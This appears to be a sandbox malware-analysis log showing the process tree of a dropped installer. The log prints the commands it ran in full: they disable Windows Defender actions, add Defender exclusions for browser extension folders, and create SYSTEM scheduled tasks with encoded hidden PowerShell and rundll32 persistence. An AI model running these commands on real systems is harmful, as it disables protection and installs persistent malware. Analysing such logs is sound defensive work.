C:\Users\Admin\AppData\Local\Temp\7zS86F3.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zS86F3.tmp\Install.exe Fh /rmXHdidZiVk 385137 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:2296 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2440 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:4828 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:4988
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:848
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:2908
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:1588
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:564
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:2276
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:4648
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:3204
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:2320
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:3968
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:5088
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:3932
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:5000
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:4756
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:2476
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:4472
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:1676
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:4152
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:3156
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:3152
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:4492
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:4400
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:4496
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:4500
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:2396
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:4712
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:3624
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:4960
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GIQQUhncIGKFfsOrPfR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GIQQUhncIGKFfsOrPfR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LSzduEfHsNpU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LSzduEfHsNpU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dNSKkTdIqXSDC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dNSKkTdIqXSDC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fhnTwgTKABUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fhnTwgTKABUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\lIJEFxkNU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\lIJEFxkNU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\PUnbqvJlgjHAWzVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\PUnbqvJlgjHAWzVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\EAXvJtSASasFHtiXl\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\EAXvJtSASasFHtiXl\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\UnkSsAUmPJldPerG\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\UnkSsAUmPJldPerG\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2528 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GIQQUhncIGKFfsOrPfR" /t REG_DWORD /d 0 /reg:323⤵PID:4036
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GIQQUhncIGKFfsOrPfR" /t REG_DWORD /d 0 /reg:324⤵PID:3816
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GIQQUhncIGKFfsOrPfR" /t REG_DWORD /d 0 /reg:643⤵PID:4312
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LSzduEfHsNpU2" /t REG_DWORD /d 0 /reg:323⤵PID:3420
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LSzduEfHsNpU2" /t REG_DWORD /d 0 /reg:643⤵PID:3416
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dNSKkTdIqXSDC" /t REG_DWORD /d 0 /reg:323⤵PID:3008
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dNSKkTdIqXSDC" /t REG_DWORD /d 0 /reg:643⤵PID:4776
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fhnTwgTKABUn" /t REG_DWORD /d 0 /reg:323⤵PID:4204
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fhnTwgTKABUn" /t REG_DWORD /d 0 /reg:643⤵PID:2896
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lIJEFxkNU" /t REG_DWORD /d 0 /reg:323⤵PID:2632
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lIJEFxkNU" /t REG_DWORD /d 0 /reg:643⤵PID:3192
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\PUnbqvJlgjHAWzVB /t REG_DWORD /d 0 /reg:323⤵PID:4524
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\PUnbqvJlgjHAWzVB /t REG_DWORD /d 0 /reg:643⤵PID:1996
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:2072
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:1704
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:4616
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:4628
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\EAXvJtSASasFHtiXl /t REG_DWORD /d 0 /reg:323⤵PID:4784
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\EAXvJtSASasFHtiXl /t REG_DWORD /d 0 /reg:643⤵PID:4540
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\UnkSsAUmPJldPerG /t REG_DWORD /d 0 /reg:323⤵PID:4908
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\UnkSsAUmPJldPerG /t REG_DWORD /d 0 /reg:643⤵PID:2912
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gyWeynvlB" /SC once /ST 02:49:19 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Scheduled Task/Job: Scheduled Task
PID:956
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gyWeynvlB"2⤵PID:2608
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gyWeynvlB"2⤵PID:2312
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "NDvladDJhDVrRoudV" /SC once /ST 03:57:37 /RU "SYSTEM" /TR "\"C:\Windows\Temp\UnkSsAUmPJldPerG\RKVdxzPYOvvDNOO\KuNcbdj.exe\" Mv /CMSVdidce 385137 /S" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:3316
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "NDvladDJhDVrRoudV"2⤵PID:3892
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2296 -s 7882⤵
- Program crash
PID:3916
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4696 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:4520
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:2272
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:3704
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:444
-
C:\Windows\Temp\UnkSsAUmPJldPerG\RKVdxzPYOvvDNOO\KuNcbdj.exeC:\Windows\Temp\UnkSsAUmPJldPerG\RKVdxzPYOvvDNOO\KuNcbdj.exe Mv /CMSVdidce 385137 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1544 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bRGikqFCffkwOXLBIB"2⤵PID:1568
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵PID:5052
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵PID:2496
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵PID:3120
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1404 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:3420
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\lIJEFxkNU\FaRJBG.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "YVjRlmjtlQYvPsI" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:1676
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "YVjRlmjtlQYvPsI2" /F /xml "C:\Program Files (x86)\lIJEFxkNU\ReCwzuZ.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:344
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "YVjRlmjtlQYvPsI"2⤵PID:4576
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "YVjRlmjtlQYvPsI"2⤵PID:1576
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "vyKaxqxekDmxZa" /F /xml "C:\Program Files (x86)\LSzduEfHsNpU2\lzNPzbt.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:4044
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ozZsjsYGhfiRl2" /F /xml "C:\ProgramData\PUnbqvJlgjHAWzVB\zuiGrFG.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:1720
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "qsoizQKWdWcYNxmUb2" /F /xml "C:\Program Files (x86)\GIQQUhncIGKFfsOrPfR\FEMBIMc.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:4632
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "OlGMRtymGsXLsrUaJtj2" /F /xml "C:\Program Files (x86)\dNSKkTdIqXSDC\ktvVsvn.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
